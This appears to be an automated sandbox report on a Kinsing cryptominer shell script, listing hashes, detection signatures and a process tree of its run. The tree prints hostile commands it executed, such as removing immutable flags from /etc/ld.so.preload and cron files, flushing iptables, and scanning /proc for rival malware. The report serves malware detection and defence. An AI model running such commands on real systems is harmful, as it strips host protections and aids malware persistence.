Analysis
-
max time kernel
114s -
max time network
86s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
23/02/2025, 18:52
Static task
static1
Behavioral task
behavioral1
Sample
sm.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sm.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
sm.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
sm.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
sm.sh
-
Size
15KB
-
MD5
56bbe1eb7b2960b3710c41fc5a41e94c
-
SHA1
60ae0a549c4dfaa5a24f2e932144c9a3a9450508
-
SHA256
fda4e028befffaf446b8bc494723729887ba79161d492d0ee06f0c0be66cfcd0
-
SHA512
929a84d75383e8ecf07dc8f9fc1eb8c2186fd778e499446e8eba6c43bff09316822e7bab43b073575224ea8d1e3f1fa9ff79ae9a0a56be93acdc64525831c152
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwf:trgXux7YJDj8OoJwf
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral4/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload sm.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1703 chmod 1705 chmod 1710 chmod 1712 chmod 1718 chmod 1719 chmod 1692 chmod 1694 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1720 sm.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 723 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1440 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1603 xargs 1478 xargs 1514 xargs 1519 xargs 1544 xargs 1550 xargs 1609 xargs 1681 xargs 709 chattr 1538 xargs 1556 xargs 1597 xargs 1616 sed 1601 sed 1610 sed 1622 sed 1625 sed 1642 xargs 1647 xargs 1659 xargs 1449 uname 1607 sed 1621 xargs 1624 xargs 1630 xargs 1562 xargs 717 chattr 1499 xargs 1504 xargs 1619 sed 1628 sed 1686 xargs 719 chattr 1473 xargs 1509 xargs 1606 xargs 1488 xargs 1494 xargs 1526 xargs 1594 xargs 1595 sed 1612 xargs 1627 xargs 1483 xargs 1531 xargs 1598 sed 1600 xargs 1604 sed 1618 xargs 1670 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.vgpJvf crontab File opened for modification /var/spool/cron/crontabs/tmp.z82Dni crontab File opened for modification /var/spool/cron/crontabs/tmp.OkSzoE crontab File opened for modification /var/spool/cron/crontabs/tmp.nMaiEf crontab File opened for modification /var/spool/cron/crontabs/tmp.WLYDRX crontab File opened for modification /var/spool/cron/crontabs/tmp.MRHrhr crontab File opened for modification /var/spool/cron/crontabs/tmp.5g0E1f crontab File opened for modification /var/spool/cron/crontabs/tmp.rU5D0p crontab File opened for modification /var/spool/cron/crontabs/tmp.e07fBd crontab File opened for modification /var/spool/cron/crontabs/tmp.a13axR crontab File opened for modification /var/spool/cron/crontabs/tmp.TPpEZg crontab File opened for modification /var/spool/cron/crontabs/tmp.vdE3ma crontab File opened for modification /var/spool/cron/crontabs/tmp.00iH0G crontab File opened for modification /var/spool/cron/crontabs/tmp.nDiOJN crontab File opened for modification /var/spool/cron/crontabs/tmp.XwCoLt crontab File opened for modification /var/spool/cron/crontabs/tmp.XNKtCN crontab File opened for modification /var/spool/cron/crontabs/tmp.oMNUN6 crontab File opened for modification /var/spool/cron/crontabs/tmp.ZUuy5C crontab File opened for modification /var/spool/cron/crontabs/tmp.zonbMp crontab File opened for modification /var/spool/cron/crontabs/tmp.D90ImA crontab File opened for modification /var/spool/cron/crontabs/tmp.lZajYC crontab File opened for modification /var/spool/cron/crontabs/tmp.wXLXfV crontab File opened for modification /var/spool/cron/crontabs/tmp.v6kUOJ crontab File opened for modification /var/spool/cron/crontabs/tmp.BdN1LA crontab File opened for modification /var/spool/cron/crontabs/tmp.iEVCXa crontab File opened for modification /var/spool/cron/crontabs/tmp.Y1mSjS crontab File opened for modification /var/spool/cron/crontabs/tmp.FUxVUj crontab File opened for modification /var/spool/cron/crontabs/tmp.QX6exi crontab File opened for modification /var/spool/cron/crontabs/tmp.AuQaNv crontab File opened for modification /var/spool/cron/crontabs/tmp.AXxoW7 crontab File opened for modification /var/spool/cron/crontabs/tmp.fpStYQ crontab File opened for modification /var/spool/cron/crontabs/tmp.SlocMt crontab File opened for modification /var/spool/cron/crontabs/tmp.eUvBca crontab File opened for modification /var/spool/cron/crontabs/tmp.wwID52 crontab File opened for modification /var/spool/cron/crontabs/tmp.xxg5b3 crontab File opened for modification /var/spool/cron/crontabs/tmp.Sdjl9Q crontab File opened for modification /var/spool/cron/crontabs/tmp.8Or5uj crontab File opened for modification /var/spool/cron/crontabs/tmp.2rzZMv crontab File opened for modification /var/spool/cron/crontabs/tmp.ATLMaa crontab File opened for modification /var/spool/cron/crontabs/tmp.Nhatdb crontab File opened for modification /var/spool/cron/crontabs/tmp.35cdh0 crontab File opened for modification /var/spool/cron/crontabs/tmp.bL3mGT crontab File opened for modification /var/spool/cron/crontabs/tmp.p9ihFY crontab File opened for modification /var/spool/cron/crontabs/tmp.duuixE crontab File opened for modification /var/spool/cron/crontabs/tmp.iGt5uk crontab File opened for modification /var/spool/cron/crontabs/tmp.BGIZWs crontab File opened for modification /var/spool/cron/crontabs/tmp.Yis3lp crontab File opened for modification /var/spool/cron/crontabs/tmp.mnEVLh crontab File opened for modification /var/spool/cron/crontabs/tmp.vZN6nd crontab File opened for modification /var/spool/cron/crontabs/tmp.ahUYi1 crontab File opened for modification /var/spool/cron/crontabs/tmp.nekf9A crontab File opened for modification /var/spool/cron/crontabs/tmp.mirDZA crontab File opened for modification /var/spool/cron/crontabs/tmp.7EpuLF crontab File opened for modification /var/spool/cron/crontabs/tmp.cpBlSp crontab File opened for modification /var/spool/cron/crontabs/tmp.vg5IHm crontab File opened for modification /var/spool/cron/crontabs/tmp.eUscdi crontab File opened for modification /var/spool/cron/crontabs/tmp.tiXF0s crontab File opened for modification /var/spool/cron/crontabs/tmp.n4QUI8 crontab File opened for modification /var/spool/cron/crontabs/tmp.atAKYT crontab File opened for modification /var/spool/cron/crontabs/tmp.qir0Lz crontab File opened for modification /var/spool/cron/crontabs/tmp.s0NZDa crontab File opened for modification /var/spool/cron/crontabs/tmp.2AjHz1 crontab File opened for modification /var/spool/cron/crontabs/tmp.lrxzwX crontab File opened for modification /var/spool/cron/crontabs/tmp.jB4gEf crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service sm.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1505 ps 1510 ps 1515 ps 1527 ps 1638 ps 1643 ps 1682 ps 1490 ps 1500 ps 1522 ps 1590 ps 1495 ps -
description ioc Process File opened for reading /proc/15/cmdline pkill File opened for reading /proc/671/stat ps File opened for reading /proc/9/cmdline pkill File opened for reading /proc/78/cmdline ps File opened for reading /proc/15/cmdline pkill File opened for reading /proc/677/cmdline pkill File opened for reading /proc/17/cmdline ps File opened for reading /proc/75/status pkill File opened for reading /proc/706/status pkill File opened for reading /proc/73/status pkill File opened for reading /proc/9/status ps File opened for reading /proc/706/status pkill File opened for reading /proc/145/status pkill File opened for reading /proc/16/status pkill File opened for reading /proc/3/status pkill File opened for reading /proc/24/status pkill File opened for reading /proc/1483/stat ps File opened for reading /proc/172/stat ps File opened for reading /proc/4/cmdline pkill File opened for reading /proc/704/status pkill File opened for reading /proc/24/stat ps File opened for reading /proc/72/status pkill File opened for reading /proc/16/status ps File opened for reading /proc/79/cmdline pkill File opened for reading /proc/358/status pkill File opened for reading /proc/671/cmdline pkill File opened for reading /proc/2/status pkill File opened for reading /proc/10/stat ps File opened for reading /proc/1646/stat ps File opened for reading /proc/uptime ps File opened for reading /proc/4/status ps File opened for reading /proc/76/cmdline pkill File opened for reading /proc/76/status pkill File opened for reading /proc/76/cmdline ps File opened for reading /proc/7/stat ps File opened for reading /proc/18/status ps File opened for reading /proc/22/cmdline pkill File opened for reading /proc/358/cmdline pkill File opened for reading /proc/122/status pkill File opened for reading /proc/9/cmdline pkill File opened for reading /proc/70/status pkill File opened for reading /proc/1487/status ps File opened for reading /proc/3/status pkill File opened for reading /proc/427/status ps File opened for reading /proc/19/status pkill File opened for reading /proc/4/cmdline pkill File opened for reading /proc/self/fd xargs File opened for reading /proc/71/cmdline ps File opened for reading /proc/111/status pkill File opened for reading /proc/671/cmdline ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/3/status pkill File opened for reading /proc/710/status pkill File opened for reading /proc/12/cmdline ps File opened for reading /proc/filesystems pkill File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems ls File opened for reading /proc/17/stat ps File opened for reading /proc/172/cmdline ps File opened for reading /proc/8/status pkill File opened for reading /proc/7/status ps File opened for reading /proc/72/status pkill File opened for reading /proc/358/status pkill File opened for reading /proc/15/status pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1387 ls 1825 sed
Processes
-
/tmp/sm.sh/tmp/sm.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:706 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:709
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:715
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:717
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:719
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:723
-
-
/bin/grepgrep exe2⤵PID:732
-
-
/bin/lsls -latrh /proc/12⤵PID:731
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:737
-
-
/bin/grepgrep exe2⤵PID:741
-
-
/bin/lsls -latrh /proc/102⤵PID:740
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:743
-
-
/bin/grepgrep exe2⤵PID:747
-
-
/bin/lsls -latrh /proc/112⤵PID:746
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:750
-
-
/bin/grepgrep exe2⤵PID:754
-
-
/bin/lsls -latrh /proc/1112⤵PID:753
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:758
-
-
/bin/grepgrep exe2⤵PID:761
-
-
/bin/lsls -latrh /proc/122⤵PID:760
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:764
-
-
/bin/grepgrep exe2⤵PID:767
-
-
/bin/lsls -latrh /proc/1212⤵PID:766
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:769
-
-
/bin/grepgrep exe2⤵PID:773
-
-
/bin/lsls -latrh /proc/1222⤵PID:772
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:775
-
-
/bin/grepgrep exe2⤵PID:778
-
-
/bin/lsls -latrh /proc/132⤵PID:777
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:780
-
-
/bin/grepgrep exe2⤵PID:783
-
-
/bin/lsls -latrh /proc/142⤵PID:782
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:785
-
-
/bin/grepgrep exe2⤵PID:788
-
-
/bin/lsls -latrh /proc/1452⤵PID:787
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:790
-
-
/bin/grepgrep exe2⤵PID:793
-
-
/bin/lsls -latrh /proc/152⤵PID:792
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:795
-
-
/bin/lsls -latrh /proc/1542⤵PID:797
-
-
/bin/grepgrep exe2⤵PID:798
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:800
-
-
/bin/grepgrep exe2⤵PID:803
-
-
/bin/lsls -latrh /proc/162⤵PID:802
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:805
-
-
/bin/grepgrep exe2⤵PID:808
-
-
/bin/lsls -latrh /proc/172⤵PID:807
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:810
-
-
/bin/lsls -latrh /proc/1722⤵PID:812
-
-
/bin/grepgrep exe2⤵PID:813
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:815
-
-
/bin/grepgrep exe2⤵PID:818
-
-
/bin/lsls -latrh /proc/182⤵PID:817
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:820
-
-
/bin/grepgrep exe2⤵PID:823
-
-
/bin/lsls -latrh /proc/192⤵PID:822
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:825
-
-
/bin/grepgrep exe2⤵PID:828
-
-
/bin/lsls -latrh /proc/22⤵PID:827
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:830
-
-
/bin/grepgrep exe2⤵PID:833
-
-
/bin/lsls -latrh /proc/202⤵PID:832
-
-
